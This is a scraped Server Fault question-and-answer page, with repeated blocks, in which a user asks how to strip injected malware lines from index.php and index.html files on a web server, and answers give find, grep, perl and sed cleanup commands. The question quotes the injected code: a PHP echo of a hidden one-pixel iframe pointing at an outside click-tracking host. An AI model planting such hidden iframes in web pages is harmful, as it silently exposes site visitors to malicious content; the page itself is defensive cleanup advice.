Search for index.php and index.html and replace stringRemove eml and HTML:Nimda viruses from my Linux machineWhat is a good bulk find / replace tool for windows?How to recursively search and replace from command line on unix/linux system Perl search & replaceMass search / replace string from ssh?find and replace text with sequence of numbersHow to reach ftp-server by using \ftp.server.com in “search in programs and files”Debian, Search and replace iframe injectionMatch Same column and replace the valuesFind and replace files in linuxFind and replace string between two delimiters
Show that this function is bounded
Watts vs. Volt Amps
Are DSA and ECDSA provably secure assuming DL security?
looking for a book of short stories I read in the 80's cannot remember name
Which comes first? Multiple Imputation, Splitting into train/test, or Standardization/Normalization
At what point in time did Dumbledore ask Snape for this favor?
Why would future John risk sending back a T-800 to save his younger self?
What should the arbiter and what should have I done in this case?
Can anyone identify this tank?
An average heaven where everyone has sexless golden bodies and is bored
How does an ordinary object become radioactive?
How to Analytically Solve this PDE?
Compiling c files on ubuntu and using the executable on Windows
What is the `some` keyword in SwiftUI
Chemmacros scheme translation
How would a aircraft visually signal "in distress"?
Do any instruments not produce overtones?
Investing in a Roth IRA with a Personal Loan?
Using a found spellbook as a Sorcerer-Wizard multiclass
Arriving at the same result with the opposite hypotheses
How can I most clearly write a homebrew item that affects the ground below its radius after the initial explosion it creates?
Smooth switching between 12 V batteries, with a toggle switch
What's the name of this light airplane?
What can I, as a user, do about offensive reviews in App Store?
Search for index.php and index.html and replace string
Remove eml and HTML:Nimda viruses from my Linux machineWhat is a good bulk find / replace tool for windows?How to recursively search and replace from command line on unix/linux system Perl search & replaceMass search / replace string from ssh?find and replace text with sequence of numbersHow to reach ftp-server by using \ftp.server.com in “search in programs and files”Debian, Search and replace iframe injectionMatch Same column and replace the valuesFind and replace files in linuxFind and replace string between two delimiters
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty height:90px;width:728px;box-sizing:border-box;
I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):
echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";
echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";
So the parameter after "click=" always changes. These two were only examples.
Is there a way to do that quick and fast?
.
.
EDIT: It is on my webserver, so no use of find...
ftp replace
add a comment |
I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):
echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";
echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";
So the parameter after "click=" always changes. These two were only examples.
Is there a way to do that quick and fast?
.
.
EDIT: It is on my webserver, so no use of find...
ftp replace
You want to do what the malware is doing?
– random
Jul 18 '09 at 8:29
No. I want to remove the line!
– Jonas
Jul 18 '09 at 15:54
add a comment |
I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):
echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";
echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";
So the parameter after "click=" always changes. These two were only examples.
Is there a way to do that quick and fast?
.
.
EDIT: It is on my webserver, so no use of find...
ftp replace
I recently had some sort of Malware on my computer that added to all index.php and index.html ON THE WEBSERVER! the following string(s):
echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";
echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";
So the parameter after "click=" always changes. These two were only examples.
Is there a way to do that quick and fast?
.
.
EDIT: It is on my webserver, so no use of find...
ftp replace
ftp replace
edited May 21 at 13:50
yagmoth555♦
12.7k31842
12.7k31842
asked Jul 18 '09 at 0:17
JonasJonas
32
32
You want to do what the malware is doing?
– random
Jul 18 '09 at 8:29
No. I want to remove the line!
– Jonas
Jul 18 '09 at 15:54
add a comment |
You want to do what the malware is doing?
– random
Jul 18 '09 at 8:29
No. I want to remove the line!
– Jonas
Jul 18 '09 at 15:54
You want to do what the malware is doing?
– random
Jul 18 '09 at 8:29
You want to do what the malware is doing?
– random
Jul 18 '09 at 8:29
No. I want to remove the line!
– Jonas
Jul 18 '09 at 15:54
No. I want to remove the line!
– Jonas
Jul 18 '09 at 15:54
add a comment |
5 Answers
5
active
oldest
votes
one easy way to do this is by using find and grep, plus perl to do the edits.
first, construct a list of filenames that have been compromised:
find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt
next, use perl to edit the files and remove the exploit:
cat /tmp/compromised-files.txt |
xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'
(yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)
that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.
this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)
this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.
BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.
Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer
– Jonas
Jul 18 '09 at 16:10
if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.
– cas
Jul 18 '09 at 23:02
alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.
– cas
Jul 18 '09 at 23:03
Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!
– Jonas
Jul 18 '09 at 23:22
add a comment |
sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).
Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.
add a comment |
Try regexxer
or rpl
type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.
add a comment |
Assuming that the domain is always the same and shouldn't legitimately exist anywhere:
find <documentroot> -name 'index.html' -or -name 'index.php'
-exec sed -i'.bak' '/fabujob.com/d' ;
Originals will be saved with the extension '.bak
'. You can just use -i
if you don't want backups.
add a comment |
If you know you have no <iframe> tags in your documents, you can simply do
perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)
If you do have iframes, then you'll need to make your regex more exact.
Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.
add a comment |
Your Answer
StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "2"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);
else
createEditor();
);
function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);
);
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f42393%2fsearch-for-index-php-and-index-html-and-replace-string%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
5 Answers
5
active
oldest
votes
5 Answers
5
active
oldest
votes
active
oldest
votes
active
oldest
votes
one easy way to do this is by using find and grep, plus perl to do the edits.
first, construct a list of filenames that have been compromised:
find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt
next, use perl to edit the files and remove the exploit:
cat /tmp/compromised-files.txt |
xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'
(yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)
that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.
this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)
this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.
BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.
Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer
– Jonas
Jul 18 '09 at 16:10
if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.
– cas
Jul 18 '09 at 23:02
alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.
– cas
Jul 18 '09 at 23:03
Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!
– Jonas
Jul 18 '09 at 23:22
add a comment |
one easy way to do this is by using find and grep, plus perl to do the edits.
first, construct a list of filenames that have been compromised:
find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt
next, use perl to edit the files and remove the exploit:
cat /tmp/compromised-files.txt |
xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'
(yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)
that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.
this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)
this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.
BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.
Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer
– Jonas
Jul 18 '09 at 16:10
if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.
– cas
Jul 18 '09 at 23:02
alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.
– cas
Jul 18 '09 at 23:03
Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!
– Jonas
Jul 18 '09 at 23:22
add a comment |
one easy way to do this is by using find and grep, plus perl to do the edits.
first, construct a list of filenames that have been compromised:
find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt
next, use perl to edit the files and remove the exploit:
cat /tmp/compromised-files.txt |
xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'
(yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)
that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.
this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)
this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.
BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.
one easy way to do this is by using find and grep, plus perl to do the edits.
first, construct a list of filenames that have been compromised:
find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt
next, use perl to edit the files and remove the exploit:
cat /tmp/compromised-files.txt |
xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'
(yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)
that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.
this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)
this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.
BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.
answered Jul 18 '09 at 1:40
cascas
5,6472229
5,6472229
Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer
– Jonas
Jul 18 '09 at 16:10
if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.
– cas
Jul 18 '09 at 23:02
alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.
– cas
Jul 18 '09 at 23:03
Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!
– Jonas
Jul 18 '09 at 23:22
add a comment |
Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer
– Jonas
Jul 18 '09 at 16:10
if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.
– cas
Jul 18 '09 at 23:02
alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.
– cas
Jul 18 '09 at 23:03
Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!
– Jonas
Jul 18 '09 at 23:22
Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer
– Jonas
Jul 18 '09 at 16:10
Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer
– Jonas
Jul 18 '09 at 16:10
if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.
– cas
Jul 18 '09 at 23:02
if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.
– cas
Jul 18 '09 at 23:02
alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.
– cas
Jul 18 '09 at 23:03
alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.
– cas
Jul 18 '09 at 23:03
Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!
– Jonas
Jul 18 '09 at 23:22
Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!
– Jonas
Jul 18 '09 at 23:22
add a comment |
sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).
Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.
add a comment |
sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).
Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.
add a comment |
sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).
Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.
sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).
Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.
answered Jul 18 '09 at 0:28
Sven♦Sven
88.5k10150202
88.5k10150202
add a comment |
add a comment |
Try regexxer
or rpl
type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.
add a comment |
Try regexxer
or rpl
type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.
add a comment |
Try regexxer
or rpl
type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.
Try regexxer
or rpl
type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.
answered Jul 18 '09 at 3:31
Saurabh BarjatiyaSaurabh Barjatiya
4,06712431
4,06712431
add a comment |
add a comment |
Assuming that the domain is always the same and shouldn't legitimately exist anywhere:
find <documentroot> -name 'index.html' -or -name 'index.php'
-exec sed -i'.bak' '/fabujob.com/d' ;
Originals will be saved with the extension '.bak
'. You can just use -i
if you don't want backups.
add a comment |
Assuming that the domain is always the same and shouldn't legitimately exist anywhere:
find <documentroot> -name 'index.html' -or -name 'index.php'
-exec sed -i'.bak' '/fabujob.com/d' ;
Originals will be saved with the extension '.bak
'. You can just use -i
if you don't want backups.
add a comment |
Assuming that the domain is always the same and shouldn't legitimately exist anywhere:
find <documentroot> -name 'index.html' -or -name 'index.php'
-exec sed -i'.bak' '/fabujob.com/d' ;
Originals will be saved with the extension '.bak
'. You can just use -i
if you don't want backups.
Assuming that the domain is always the same and shouldn't legitimately exist anywhere:
find <documentroot> -name 'index.html' -or -name 'index.php'
-exec sed -i'.bak' '/fabujob.com/d' ;
Originals will be saved with the extension '.bak
'. You can just use -i
if you don't want backups.
edited Jul 18 '09 at 10:31
answered Jul 18 '09 at 9:44
Dan CarleyDan Carley
22.3k34668
22.3k34668
add a comment |
add a comment |
If you know you have no <iframe> tags in your documents, you can simply do
perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)
If you do have iframes, then you'll need to make your regex more exact.
Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.
add a comment |
If you know you have no <iframe> tags in your documents, you can simply do
perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)
If you do have iframes, then you'll need to make your regex more exact.
Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.
add a comment |
If you know you have no <iframe> tags in your documents, you can simply do
perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)
If you do have iframes, then you'll need to make your regex more exact.
Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.
If you know you have no <iframe> tags in your documents, you can simply do
perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)
If you do have iframes, then you'll need to make your regex more exact.
Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.
answered May 3 '10 at 18:46
Andy LesterAndy Lester
613415
613415
add a comment |
add a comment |
Thanks for contributing an answer to Server Fault!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f42393%2fsearch-for-index-php-and-index-html-and-replace-string%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
You want to do what the malware is doing?
– random
Jul 18 '09 at 8:29
No. I want to remove the line!
– Jonas
Jul 18 '09 at 15:54